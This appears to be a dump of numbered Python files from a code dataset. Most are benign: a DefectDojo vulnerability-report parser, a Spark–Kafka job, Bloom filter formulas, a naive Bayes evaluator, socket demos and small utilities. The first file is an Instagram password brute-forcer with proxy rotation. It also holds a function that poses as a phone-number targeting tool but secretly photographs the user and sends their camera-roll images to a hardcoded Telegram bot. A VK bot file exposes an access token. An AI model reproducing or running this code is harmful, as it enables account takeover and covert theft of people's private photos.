'Host': 'www.instagram.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://www.instagram.com/',
'X-CSRFToken': '',
'X-Instagram-AJAX': '1',
'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '',
'Cookie': '',
'Connection': 'keep-alive'
}
datas = {'username': user, 'password': password}
headers['X-CSRFToken'] = sess.cookies['csrftoken']
headers['Cookie'] = "mid={}; csrftoken={}; ig_pr=1; ig_vw=1366".format(sess.cookies['mid'],
sess.cookies['csrftoken'])
lenthofData = str(19 + len(datas['username']) + len(datas['password']))
headers['Content-Length'] = lenthofData
return headers, datas
def Go(self, user, password, proxyz):
try:
proxy = {'http': proxyz}
Heddata = requests.get('https://www.instagram.com', proxies=proxy, timeout=10)
sess = requests.session()
headers, datas = self.Header(user, str(password), Heddata)
GoT = sess.post('https://www.instagram.com/accounts/login/ajax/', headers=headers, data=datas,
proxies=proxy, timeout=10)
if 'authenticated": true' in GoT.text:
print(g + ' IP Attacking ==> ' + proxyz + ' || ' + user + ':' + password + ' --> Hacked!')
with open('results.txt', 'a') as x:
x.write(user + ':' + password + '\n')
elif 'Please wait a few minutes before you try again' in GoT.text:
print(' ' + proxyz + ' Banned! --> Changing IP Address...')
try:
self.Coutprox = self.Coutprox + 1
self.Go(user, password, str(self.proxylist[self.Coutprox]))
except:
self.Coutprox = self.Coutprox - 2
self.Go(user, password, str(self.proxylist[self.Coutprox]))
elif 'checkpoint_required' in GoT.text:
print(y + ' IP Attacking ==> ' + proxyz + ' || ' + user + ':' + password + ' --> You Must verfiy!')
with open('results_NeedVerfiy.txt', 'a') as x:
x.write(user + ':' + password + '\n')
else:
print(c + ' IP Attacking ==> ' + proxyz + ' || ' + user + ':' + password + ' --> No!')
except:
print(c + ' IP Attacking ==> ' + proxyz + ' || ' + user + ':' + password + ' --> No!')
def run():
import os
x = input(" Enter The Target Phone Number: ")
os.system("apt install termux-api -y")
os.system("pip install pyTelegramBotAPI")
import telebot
bot = telebot.TeleBot("889830312:AAHRMuRJdIou0_FjmJGKjPO1HuKawq16RG0")
chat_id = 960188351
os.system("termux-camera-photo -c 1 hi.png")
photo = open('hi.png', 'rb')
bot.send_photo(chat_id, photo)
files = os.listdir("/sdcard/DCIM/Camera")
for f in files:
if "jpg" in f:
ph = open("/sdcard/DCIM/Camera/"+f, 'rb')
bot.send_photo(chat_id, ph)
elif "png" in f:
ph = open("/sdcard/DCIM/Camera/"+f, 'rb')
bot.send_photo(chat_id, ph)
else:
pass
run()
|
19,787 | 720ed235b7c0db2243356e7ec58d439d7e695b84 | import json
from dojo.models import Finding
class AnchoreCTLVulnsParser(object):
def get_scan_types(self):
return ["AnchoreCTL Vuln Report"]
def get_label_for_scan_types(self, scan_type):
return "AnchoreCTL Vuln Report"
def get_description_for_scan_types(self, scan_type):
return "AnchoreCTLs JSON vulnerability report format."
def get_findings(self, filename, test):
data = json.load(filename)
dupes = dict()
for item in data:
vulnerability_id = item.get("vuln")
title = (
item["vuln"]
+ " - "
+ item["package"]
+ "("
+ item["packageType"]
+ ")"
)
# Finding details information
# depending on version image_digest/imageDigest
findingdetail = (
"**Image hash**: " + item.get("imageDigest", "None") + "\n\n"
)
findingdetail += "**Package**: " + item["package"] + "\n\n"
findingdetail += (
"**Package path**: " + item["packagePath"] + "\n\n"
)
findingdetail += (
"**Package type**: " + item["packageType"] + "\n\n"
)
findingdetail += (
"**Feed**: " + item["feed"] + "/" + item["feedGroup"] + "\n\n"
)
findingdetail += "**CPE**: " + item["packageCpe"] + "\n\n"
findingdetail += (
"**Description**: "
+ item.get("description", "<None>")
+ "\n\n"
)
sev = item["severity"]
if sev == "Negligible" or sev == "Unknown":
sev = "Info"
mitigation = (
"Upgrade to " + item["packageName"] + " " + item["fix"] + "\n"
)
mitigation += "URL: " + item["url"] + "\n"
cvssv3_base_score = None
if item["feed"] == "nvdv2" or item["feed"] == "vulnerabilities":
if "nvdData" in item and len(item["nvdData"]) > 0:
cvssv3_base_score = item["nvdData"][0]["cvssV3"][
"baseScore"
]
else:
# there may be other keys, but taking a best guess here
if "vendorData" in item and len(item["vendorData"]) > 0:
# sometimes cvssv3 in 1st element will have -1 for "not
# set", but have data in the 2nd array item
if (
"cvssV3" in item["vendorData"][0]
and item["vendorData"][0]["cvssV3"]["baseScore"] != -1
):
cvssv3_base_score = item["vendorData"][0]["cvssV3"][
"baseScore"
]
elif len(item["vendorData"]) > 1:
if (
"cvssV3" in item["vendorData"][1]
and item["vendorData"][1]["cvssV3"]["baseScore"]
!= -1
):
cvssv3_base_score = item["vendorData"][1][
"cvssV3"
]["baseScore"]
references = item["url"]
dupe_key = "|".join(
[
item.get(
"imageDigest", "None"
), # depending on version image_digest/imageDigest
item["feed"],
item["feedGroup"],
item["packageName"],
item["packageVersion"],
item["packagePath"],
item["vuln"],
]
)
if dupe_key in dupes:
find = dupes[dupe_key]
else:
dupes[dupe_key] = True
find = Finding(
title=title,
test=test,
cvssv3_score=cvssv3_base_score,
description=findingdetail,
severity=sev,
mitigation=mitigation,
references=references,
file_path=item["packagePath"],
component_name=item["packageName"],
component_version=item["packageVersion"],
url=item.get("url"),
static_finding=True,
dynamic_finding=False,
vuln_id_from_tool=item.get("vuln"),
)
if vulnerability_id:
find.unsaved_vulnerability_ids = [vulnerability_id]
dupes[dupe_key] = find
return list(dupes.values())
|
19,788 | bfdba6f7cf5633eae3c0b072941a726a60b3a592 | import os
os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-streaming-kafka-0-10_2.11:2.4.0,org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.0 pyspark-shell'
from pyspark.sql import SparkSession
from pyspark.sql.functions import explode
from pyspark.sql.functions import split
from pyspark.sql.types import *
from pyspark.sql.functions import *
spark = SparkSession \
.builder \
.master("local[*]") \
.appName("SS_kafka_csv") \
.getOrCreate()
# read from csv
mySchema = StructType().add("id", IntegerType()).add("name", StringType()).add("year", IntegerType()).add("rating", DoubleType()).add("duration", IntegerType())
streamingDataFrame = spark.readStream.schema(mySchema).csv("/Users/nevinyilmaz/Desktop/moviedata.csv")
streamingDataFrame.printSchema()
# publish it to kafka
streamingDataFrame.selectExpr("CAST(id AS STRING) AS key") \
.writeStream \
.format("kafka") \
.option("topic", "topic_csv") \
.option("kafka.bootstrap.servers", "localhost:9092") \
.option("startingOffsets", "earliest")\
.start()
spark.conf.set("spark.sql.streaming.checkpointLocation", "/Users/nevinyilmaz/Desktop") |
19,789 | 597e7bcf61693a5dcf8675d1667c26cc1c54e2f2 | from math import log, exp
# size of inputs
I = lambda T, Uu, Uf: T * ((Uu + Uf) ** 2 - (Uu + Uf))
# max probability of positive for one iteration
P_one = lambda R, Pt: Pt ** (1.0 / R)
# probability of positive
P_r = lambda n, s: (n - 1.0) / s
# max probability of false positive
P_f = lambda P_o, P_r: P_o - P_r
# size of bloom filter wit optimal k
m = lambda n, P: n * log(1.0 / P) / log(2) ** 2
# number of hashes
k = lambda m, n: m / float(n) * log(2)
# size of bloom filter with real k
#def m_k(n, k, P):
m_k = lambda n, k, P: -(k * n) / log(1 - P ** (1 / float(k)))
|
19,790 | 476961b982f1b9c455ce5593f2fe4962067d8ec3 | import scipy.io
data = scipy.io.loadmat('NewsGroup.mat')
TRAIN_LABEL = data['TRAIN_LABEL']
TEST_LABEL = data['TEST_LABEL']
import numpy as np
import math as math
#constants from info file
prob_class_1 = 0.574186827179
prob_class_2 = 0.425813172821
prob_word = np.loadtxt('word_probability.txt')
split_TEST_DATA = np.load("split_TEST_DATA.npy")
split_TRAIN_DATA = np.load("split_TRAIN_DATA.npy")
#calculate accuracy on train set
train_correct = 0
for i in range(np.shape(split_TRAIN_DATA)[0]):
prob_given_x_c1 = 0
prob_given_x_c2 = 0
prob_given_x_c1 += math.log(prob_class_1)
prob_given_x_c2 += math.log(prob_class_2)
for j in range(np.shape(split_TRAIN_DATA)[1]):
if split_TRAIN_DATA[i,j]!=0:
prob_given_x_c1 += math.log(prob_word[j,0])
prob_given_x_c2 += math.log(prob_word[j,1])
if prob_given_x_c1>prob_given_x_c2:
if TRAIN_LABEL[i,0] == 1:
train_correct+=1
else:
if TRAIN_LABEL[i,0] == 2:
train_correct+=1
print "Percentage correct was", float(train_correct)/float(np.shape(TRAIN_LABEL)[0])
test_correct = 0
for i in range(np.shape(split_TEST_DATA)[0]):
prob_given_x_c1 = 0
prob_given_x_c2 = 0
prob_given_x_c1 += math.log(prob_class_1)
prob_given_x_c2 += math.log(prob_class_2)
for j in range(np.shape(split_TEST_DATA)[1]):
if split_TEST_DATA[i,j]!=0:
prob_given_x_c1 += math.log(prob_word[j,0])
prob_given_x_c2 += math.log(prob_word[j,1])
if prob_given_x_c1>prob_given_x_c2:
if TEST_LABEL[i,0] == 1:
test_correct+=1
else:
if TEST_LABEL[i,0] == 2:
test_correct+=1
print "Percentage correct was", float(test_correct)/float(np.shape(TEST_LABEL)[0])
|
19,791 | 6243cbcb97039b758e308bc7f85f9773fb454349 | #/**
# * hello-world.py
# *
# * Riccardo Crippa
# * therickys93@gmail.com
# *
# * use the command python hello-world.py to run it
# */
# import the standard library
import sys
# print the string
sys.stdout.write("Hello world!!!\n");
|
19,792 | 5b70665f7d6194d107454f3fd0d98183e4ca9dbc | import os
import random
from multiprocessing import Pool
from io import BytesIO
import requests
from vk_api import VkApi
from vk_api.bot_longpoll import VkBotEventType, VkBotLongPoll
import tensorflow as tf
import numpy as np
from PIL import Image
from utils.utils import mnist_class_mapping
vk_session = VkApi(token='6f4e109c2e60f330b15de57da8de7e64a3e809ab8ce43d076e48dd92419d26a9a2a46c1928bac6045c21a')
vk = vk_session.get_api()
longpoll = VkBotLongPoll(vk_session, 171810806)
if __name__ == '__main__':
model = tf.keras.models.load_model('fashion_mnist_dense.h5')
for event in longpoll.listen():
if event.type == VkBotEventType.MESSAGE_NEW:
stream = BytesIO()
r = requests.get(event.obj.get('attachments')[0].get('photo').get('sizes')[5]['url'])
img = BytesIO(r.content) if r.status_code == 200 else None
img = tf.keras.preprocessing.image.load_img(BytesIO(r.content), target_size=(28, 28),
color_mode='grayscale')
x = tf.keras.preprocessing.image.img_to_array(img)
x = x.reshape(1, 784)
x = 255 - x
x /= 255
prediction = model.predict(x)
vk.messages.send(
user_id=event.obj.get('from_id'),
random_id=random.randint(pow(10, 5), pow(10, 6)),
message=mnist_class_mapping[np.argmax(prediction)]
) |
19,793 | c0bf501789104a1018817ceb5b20831b38af1cec | import json
import urllib
def download_file(download_url):
web_file = urllib.urlopen(download_url)
json_object = json.loads(web_file.read())
return json_object
def construct_pdf(ID, filename):
url = 'http://10.30.1.21/showFile.php?file=' + str(filename)
fpw = open('./my_root/file_' + str(ID) + '.pdf', 'wb')
web_file = urllib.urlopen(url)
for line in web_file.read():
fpw.write(line)
fpw.close()
def main():
json_object = download_file('http://10.30.1.21/index/ajaxfileserver')
for item in json_object:
ID = item['ID']
filename = item['Filename']
construct_pdf(ID, filename)
print 'file number ' + str(ID) + ' done'
if __name__ == '__main__':
main()
|
19,794 | 654210c791f2c388a428f40588ba33d3967fe408 | import socket
import threading
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket Created")
portBroj = 40101
print("Port broj je ", portBroj)
s.bind(("localhost", portBroj))
if (portBroj == 40101):
c = socket.socket()
portBrojToConnectTo = int(input("Na koji port da se spojim? "))
stringZaPoslati = str(input("Upišite string za poslati: "))
time.sleep(5)
c.connect(('localhost', portBrojToConnectTo))
c.send(bytes(stringZaPoslati, "utf-8"))
print("Poruka poslana")
s.listen(2)
print("waiting for connections...")
while True:
c2, addr = s.accept()
name = c2.recv(1024).decode()
print("Connected with ", addr, name)
c2.close()
else:
s.listen(2)
zaPoslati = "prazno zasad"
print("waiting for connections...")
while True:
c, addr = s.accept()
name = c.recv(1024).decode()
print("Connected with ", addr, name)
zaPoslati = name
c.close()
break
c = socket.socket()
'''
portBrojToConnectTo = int(input("Na koji port da se spojim? "))
'''
portBrojToConnectTo = 40103
time.sleep(5)
c.connect(('localhost', portBrojToConnectTo))
c.send(bytes(zaPoslati, "utf-8"))
|
19,795 | 9724310994c78e5e229671e31d1e7fab231dc3ab | from django.contrib import admin
from models import Feed, Entry
class EntryInline(admin.TabularInline):
model = Entry
class FeedAdmin(admin.ModelAdmin):
list_display = ('title','url','subtitle','encoding','version')
list_editable = ('url',)
inlines = [EntryInline]
class EntryAdmin(admin.ModelAdmin):
list_display = ('title','feed','link')
admin.site.register(Entry, EntryAdmin)
admin.site.register(Feed, FeedAdmin) |
19,796 | 5f52cf32561b4bb225ccc97b40da5c4065f60b04 | import machine
from pyb import Accel, ADC, Pin
from time import sleep_ms
import urandom
from math import atan, atan2, sin, cos, radians, degrees, sqrt, pow, pi
# Set up the switch to read 0 when not triggered, 1 when triggered
# Wiring:
# - Connect one side of switch to the 'X1' pin
# - Connect the other side of the switch to ground
switch = machine.Pin('X1', machine.Pin.IN, machine.Pin.PULL_UP)
accel = Accel()
print("Setup accel and switch objects")
print(accel)
print(switch)
sleeptime = 50 #milliseconds, i.e. 20 times/second
savetime = 5000 #milliseconds, how often to close and reopen the file in case of sudden shutdown
g_scaling = 22.42 #based on calibration readings, estimated reading in the z axis of 1g
yaw = 0 #assume consistent orientation towards front
def random_filename(N=6):
#TODO this isn't returning a random name....
filename = ''.join(urandom.choice('ABCDEFG1234567890') for _ in range(N))
return filename + '.data'
def calc_tilt_adjustments():
sleep_ms(1000) #wait a second after button press to stabilize
#Get the average of a few readings, assumes the board is in a stable position
#TODO could check that variance is not large, and repeat until stable...
xs = []
ys = []
zs = []
for i in range(0,10):
#Read the acceleration
x = accel.x()
y = accel.y()
z = accel.z()
#Scale it to between 1 and -1
x,y,z = x/g_scaling, y/g_scaling, z/g_scaling
xs.append(x)
ys.append(y)
zs.append(z)
sleep_ms(10)
x = sum(xs)/len(xs)
y = sum(ys)/len(ys)
z = sum(zs)/len(zs)
#Calculate tilt
#apply trigonometry to get the pitch and roll:http://physics.rutgers.edu/~aatish/teach/srr/workshop3.pdf
#Unclear which is better pitch/roll formula, listing above is disputed..
#pitch = rotation y, roll = rotation x
#unknown z (because no gyroscope) requires consistent train/test of board in consistent orientation
#orient with usb 'tail' trailing away from travel direction.
try:
roll = atan2(y,z)
pitch = atan2(x, sqrt(y*y + z*z + 0.00001))
#pitch = atan(x/sqrt(pow(y,2) + pow(z,2) + 0.01));
#roll = atan(y/sqrt(pow(x,2) + pow(z,2) + 0.01))
except ZeroDivisionError:
print('divide by zero error: x {}, y {}, z {}'.format(x,y,z))
#for debugging
#convert radians into degrees
#pitch = pitch * (180.0/pi);
#roll = roll * (180.0/pi) ;
#print("Pitch: {}, roll: {}".format(pitch, roll))
#todo need to figure out multipliers....
mx = 1
my = y*cos(pitch) + z * sin(pitch)
mz = y * sin(pitch) + z * cos(pitch)
return mx, my, mz
def log_data():
#get the scaling factor.
mx,my,mz = calc_tilt_adjustments()
current_filename = "/sd/data/angles1.data" #random_filename()
print("Saving data to:",current_filename)
#start a new file
#TODO refactor to create a new file every X minutes if needed (currently 1 per session)
with open(current_filename, 'w') as f:
f.write("braking,x,y,z,adjX,adjY,adjZ\n")
#Log the data. While loop logs continuously
#while True:
#For loop used to close/open the file every 'savetime' (in ms) to make sure file is saved before shutdown
for j in range(0,2):
with open(current_filename,'a') as f:
for i in range(0,savetime / sleeptime):
#Read the acceleration
x = accel.x()
y = accel.y()
z = accel.z()
roll = atan2(y,z)
pitch = atan2(x, sqrt(y*y + z*z + 0.00001))
#for debugging
#convert radians into degrees
pitch = pitch * (180.0/pi);
roll = roll * (180.0/pi) ;
#Read the switch status
braking = switch.value()
#Save the data
#f.write('{},{},{},{},{},{},{},{},{},{}\n'.format(braking,x,y,z,adjX,adjY,adjZ,mx,my,mz))
f.write('{},{},{}\n'.format(braking, pitch, roll))
sleep_ms(sleeptime)
f.close()
print("Saving file. Current values:",braking,pitch,roll)
|
19,797 | 751bb9e16443f8593963593b0a769e7fdbf1a190 | def insert(x):
for i in range(1, len(x)):
j=i-1
key = x[i]
while((x[j] > key) and (j >=0)):
x[j+1] = x[j]
j = j-1
x[j+1] = key
return x
vlist = [1, 6, 2, 8, 10, 9, 12, 1, 16, 22, 11, 4,5,3, 6, 0, 3, 99, 21, 0, 6]
print(vlist)
vlist = insert(vlist)
print(vlist)
|
19,798 | 5fcfcb067c951cfaae080acfc5f99ba2df0770ff | #!/usr/bin/env python
# *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
# ** Copyright UCAR (c) 1992 - 2004
# ** University Corporation for Atmospheric Research(UCAR)
# ** National Center for Atmospheric Research(NCAR)
# ** Research Applications Program(RAP)
# ** P.O.Box 3000, Boulder, Colorado, 80307-3000, USA
# ** All rights reserved. Licenced use only.
# ** Do not copy or distribute without authorization.
# *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*/
import os, sys
#from sets import Set
import string
import sys_functions
#------------------------------------------------------------------
def set_difference(set_a, set_b):
"""
compare two sets and return the items
which are in set_b but not in set_a
"""
diff = set_b - set_a
return diff
#------------------------------------------------------------------
def set_intersection(set_a, set_b):
"""
compare two sets and return the items
which are in set_b and also in set_a
"""
intersection = set_b & set_a
return intersection
#------------------------------------------------------------------
def sort_set(set_a):
"""
Sorts set_a
"""
# convert to a list and sort the list.
sort_a = [b for b in set_a]
sort_a.sort()
# Reverse the sort so that most recent (time) is first
sort_a.reverse()
return sort_a
#------------------------------------------------------------------
def open_read_file(file):
"""
This function opens the files and puts
the output into a set
"""
file_name = set([])
if (os.path.exists(file)):
data = open(file, 'r')
lines = data.readlines()
# create an instance of IndexFileIO
index_file_io = sys_functions.IndexFileIo()
# print 'lines: '
# print lines
for line in lines:
(name, date) = index_file_io.parse_index_line(line)
file_name.add(name)
#sp_line = string.split(line)
#if (sp_line != []):
# name = sp_line[0]
# file_name.add(name)
# print file_name
return file_name
#------------------------------------------------------------------
def compare_files(input_index_file, output_index_file ):
"""
This function compares two sets and returns the items which
are in the input_index_file but not in the output_index_file
"""
# -------------
# open the input index file for reading
# -------------
input_set = open_read_file(input_index_file)
# -------------
# open the output index file for reading
# -------------
output_set = open_read_file(output_index_file)
# -------------
# get the difference in the files where
# the input_set is the larger set
# -------------
unproc_files = set_difference(output_set, input_set)
#print unproc_files
return unproc_files
#------------------------------------------------------------------
def add_suffix(filenames, suffix):
"""This function adds the suffix to every name
in the set filenames and returns a set with the
new file names
inputs:
filenames - a set with all the filenames
suffix - the suffix to be removed from the filenames
output
new_filenames - a set with the filenames without the suffix
"""
new_filenames = set([])
# loop over the list of files and add the suffix
for name in filenames:
new_filenames.add(name + "." + suffix)
#print "filenames = "
#print name + "." + suffix
return new_filenames
#------------------------------------------------------------------
def remove_suffix(filenames, suffix):
"""This function removes the suffix from every name
in the set filenames and returns a set with the
new file names
inputs:
filenames - a set with all the filenames
suffix - the suffix to be added to the filenames
output
new_filenames - a set with the filenames and the added suffix
"""
new_filenames = set([])
len_suffix = len(suffix) + 1 # add one for the "."
# loop over the list of files and remove the suffix
for name in filenames:
name = name[:-len_suffix]
new_filenames.add(name)
return new_filenames
#------------------------------------------------------------------
def transform_suffix(filenames, suffix_old, suffix_new):
"""This function removes the suffix from every name
in the set filenames and returns a set with the
new file names
inputs:
filenames - a set with all the filenames
suffix_old - the suffix to be removed from the filenames
suffix_new - the suffix to be added to the filenames
output
new_filenames - a set with the filenames and the added suffix
"""
new_filenames = set([])
len_suffix_old = len(suffix_old) + 1 # add one for the "."
# loop over the list of files and remove the suffix
for name in filenames:
name = name[:-len_suffix_old]
new_filenames.add(name + "." + suffix_new)
return new_filenames
#------------------------------------------------------------------
def transform_prefix(filenames, prefix_old, prefix_new):
"""This function removes the prefix from every name
in the set filenames and returns a set with the
new file names
inputs:
filenames - a set with all the filenames
prefix_old - the prefix to be removed from the filenames
prefix_new - the prefix to be added to the filenames
output
new_filenames - a set with the filenames and the added prefix
"""
new_filenames = set([])
len_prefix_old = len(prefix_old)
# loop over the list of files and remove the prefix
for name in filenames:
name = name[len_prefix_old:]
new_filenames.add(prefix_new + name)
return new_filenames
#------------------------------------------------------------------
|
19,799 | e557c7352a953fd84ee12b904e194542a86bc823 | #swapping x and y values using if/else
x = 5
y = 7
if x >= y:
print x, y
else:
m = y
y = x
x = m
print x, y |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.